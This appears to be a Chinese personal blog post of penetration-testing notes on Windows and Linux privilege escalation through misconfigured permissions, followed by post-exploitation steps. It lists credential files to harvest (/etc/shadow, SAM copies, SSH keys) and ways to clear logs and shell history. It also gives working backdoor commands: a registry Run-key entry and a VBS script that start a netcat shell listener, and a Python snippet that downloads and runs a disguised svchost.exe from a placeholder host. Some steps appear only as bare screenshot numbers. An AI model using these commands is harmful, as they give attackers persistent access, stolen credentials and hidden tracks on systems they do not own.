利用配置不当提权

利用配置不当提权

0x01 利用条件

  • 权限分配不当,编写的软件直接是用system权限运行的,一些服务是以system运行的,如果可以替换文件为恶意的代码,然后服务启动的时候就会反弹回一个root的shell

  • 找到一些默认system执行的服务,尝试替换启动服务的执行程序。

  • NTFS权限允许users修改删除

0x02 命令行下快速发现不当配置

1. icals:(windows)

icacls C:\windows\*.exe /save perm /T save成perm文件名,且循环遍历windows目录

BU是普通users组,PU是powersuser组权限,查找文件下的FA::BU

i586-mingw32msvc-gcc -o admin.exe admin.c 编译成exe程序。

2.Find:(linux)

find / -perm 777 -exec ls -l {} \;

-perm指定权限

0x03 利用配置不当提权

应用系统的配置文件

  • 应用连接数据库的配置文件
  • 后台服务运行账号

0x04 信息收集

1.linux基本的信息收集

第一个是dns配置文件,做dns的劫持

shadow是用户名的密码,离线破解密码

2.windows下的信息收集

net share 开启一个共享,把c盘共享无限制。

域管理员将其激活。

WMIC执行普通命令行无法执行的命令。

第一个读取mac和ip

查看当前系统的进程。

结束calc.exe的进程

得到系统安装的软件的版本以及名字

1563366507692

删除杀毒软件在后台偷偷删掉:

1563366526660

查看共享文件夹

1563366556772

开启远程3389桌面

1563366583781

machinename修改为localhost

查看日志:

1563366679612

3.linux收集敏感信息

linux下:

  • /etc: 大量的配置文件

  • /etc/local/etc

  • /etc/passwd

  • /etc/shadow

  • .ssh;.gnupg 一般都是隐藏的使用ls -la显示出. .ssh存在已经登录过的ssh密钥

  • 业务数据库

  • e-mail 身份认证服务器数据库

  • /tmp 临时目录存放临时数据

4.windows敏感信息收集

  • Sam数据库;注册表文件
  • %SYSTEMROOT%\repair\SAM sam修复时候保存的副本
  • %SYSTEMROOT%\System32\config\RegBack\Sam
  • 业务数据库
  • 临时文件目录
  • userProfile\APPData\Local\Microsoft\windows\Temporart internet Files\

0x05 隐藏痕迹

  • 禁止在登录界面显示新建账号

1563367503819

  • 删除日志文件

    1563367630425

  • History history -c清除

  • lsattr 查看文件的权限

  • chattr +i .bash_history 历史命令不会添加在bash历史文件中 先删除再创建在加i

  • 日志

    auth.log/secure 登录日志

    btmp/wtmp 数据文件 last查看历史登录信息 lastb

    lastlog faillog /var/log

  • 其他日志和HIDS等

0x06 放置隐藏后门

1.添加到自启项

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v AUTORUN /t
REG_SZ /d 'C:\svchost.exe /f

  • 下载nc.exe到目录\system32\nc.exe
  • reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t REG_SZ
    /d "C:\windows\system32\nc.exe -Ldp 1234 -e cmd.exe"

  • 接受反弹的shell

nc -nv 目标机器端口

2.vbs脚本

Dim objShell
Set objShell = WScript.CreateObject("WScript.shell")
objShell.run "C:\windows\system32\nc.exe -Ldp 1234 -e cmd.exe"
Set objShell = Nothing
vbs

3.python

exe = 'http://dwiadwaad/svchost.exe'
r = requests.get(exe)
if os.path.exists(os.path.abspath(os.curdir)+r"\svchost.tmp.exe"): # if_muma.exe_exists
os.popen(os.path.abspath(os.curdir)+r"\svchost.tmp.exe") #exec_muma.exe

attrib +a +b +r +h 隐藏文件的操作


  转载请注明: 星晴 利用配置不当提权

 上一篇
流畅的Python学习笔记 流畅的Python学习笔记
流畅的python学习笔记 第一章节 python特殊方法 python里面的特殊方法(魔术方法) __getitem__,len() collections.namedtuple构建一个简单的类,这个类只有少量的属性没有方法 def
2019-11-16 starjian
下一篇 
基于时间盲注的部分相关函数 基于时间盲注的部分相关函数
基于时间盲注的部分相关函数 时间盲注的函数 sleep()函数: 如果where 语句一 and sleep(3) 语句一如果成真,那么需要执行后面sleep(),那么会造成延迟,加入语句一是假的,那么就不会运行后面的sleep语句,
2019-11-16 starjian
  目录